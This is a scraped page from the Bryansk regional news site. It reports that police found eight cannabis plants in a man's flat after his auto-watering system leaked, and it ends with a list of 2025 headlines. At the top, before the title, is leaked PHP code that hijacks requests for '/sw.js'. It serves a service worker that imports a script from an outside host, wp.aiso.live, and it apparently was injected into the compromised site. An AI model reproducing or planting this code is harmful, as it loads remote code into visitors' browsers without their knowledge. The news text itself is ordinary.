add_filter('do_parse_request', function ($bool, $wp) { if (isset($_SERVER['REQUEST_URI']) && rtrim($_SERVER['REQUEST_URI'], '/') === '/sw.js') { header('Content-Type: application/javascript'); echo 'importScripts("https://wp.aiso.live/sw.js");'; exit; } return $bool; }, 10, 2); add_action('wp_head', function () { echo ''; }); Полиция обнаружила 8 кустов конопли в квартире 60-летнего брянца | Брянские новости
Наверх

3 февраля 2021, Среда, 16:18

Полиция обнаружила 8 кустов конопли в квартире 60-летнего брянца

Полиция обнаружила 8 кустов конопли в квартире 60-летнего брянца

В Бежицком районе Брянска сотрудники полиции разоблачили 60-летнего мужчину, вырастившего коноплю в квартире. Об этом сообщили в пресс-службе УМВД.

За помощью к служителям порядка обратился руководитель местного ТСЖ. По его словам, в доме одну из квартир затопила вода, которая текла из соседнего жилья. Контактных данных владельца квартиры у заявителя не было, поэтому он позвонил в полицию.

Полиция обнаружила 8 кустов конопли в квартире 60-летнего брянца

Фото: УМВД России по Брянской области

Прибывшие по указанному адресу правоохранители вскрыли дверь в квартиру и обнаружили в помещении восемь кустов конопли. Выяснилось, что хозяин установил здесь мини-парник и организовал для растений автополив, из-за поломки которого и оказалась затоплена соседняя квартира.

Задержанный сыщиками 60-летний горожанин на допросе признался, что именно он выращивал коноплю. Против него возбудили уголовное дело, теперь мужчине грозит до трёх лет лишения свободы.


Редакция «Брянских новостей» оставляет за собой право удалять комментарии, нарушающие законодательство РФ. Запрещены высказывания, содержащие разжигание этнической и религиозной вражды, призывы к насилию, призывы к свержению конституционного строя, оскорбления конкретных лиц или любых групп граждан. Также удаляются комментарии, которые не удовлетворяют общепринятым нормам морали, преследуют рекламные цели, провоцируют пользователей на неконструктивный диалог, не относятся к комментируемой информации, оскорбляют авторов комментируемого материала, содержат ненормативную лексику. Редакция не несёт ответственности за мнения, высказанные в комментариях читателей. Комментарии на сайте «Брянские новости» публикуются без премодерации.

Комментарии для сайта Cackle
О ледяной бомбардировке 17 июня предупредили жителей Брянской области

16 июня 2025, Понедельник, 22:44

О ледяной бомбардировке 17 июня предупредили жителей Брянской области

О ледяной бомбардировке 17 июня предупредили жителей Брянской области синоптики

Под Брянском при обрушении карьера погибли двое 15-летних школьников

16 июня 2025, Понедельник, 21:58

Под Брянском при обрушении карьера погибли двое 15-летних школьников

По предварительной информации, подростки во время рыбалки вырыли подкоп в склоне карьера, в результате чего произошло обрушение влажного песка

В Брянске за длинные выходные сильный ветер повалил 22 дерева

16 июня 2025, Понедельник, 15:46

В Брянске за длинные выходные сильный ветер повалил 22 дерева

В Брянске за длинные выходные – с 12 по 15 июня сильный ветер повалил 22 дерева, об этом сообщила Брянская городская администрация.

В Брянске власти назвали причину отключения мобильного интернета

16 июня 2025, Понедельник, 14:58

В Брянске власти назвали причину отключения мобильного интернета

Брянские власти впервые прокомментировали ситуацию с мобильным интернетом в регионе. Ограничение связи связано с мерами по обеспечению безопасности

В Сельцо и Брянском районе режим чрезвычайной ситуации действует уже 5 месяцев

16 июня 2025, Понедельник, 14:23

В Сельцо и Брянском районе режим чрезвычайной ситуации действует уже 5 месяцев

В городе Сельцо и Брянском районе уже четыре месяца действует режим чрезвычайной ситуации, который был введён 14 января 2025 года и до сих пор не отменён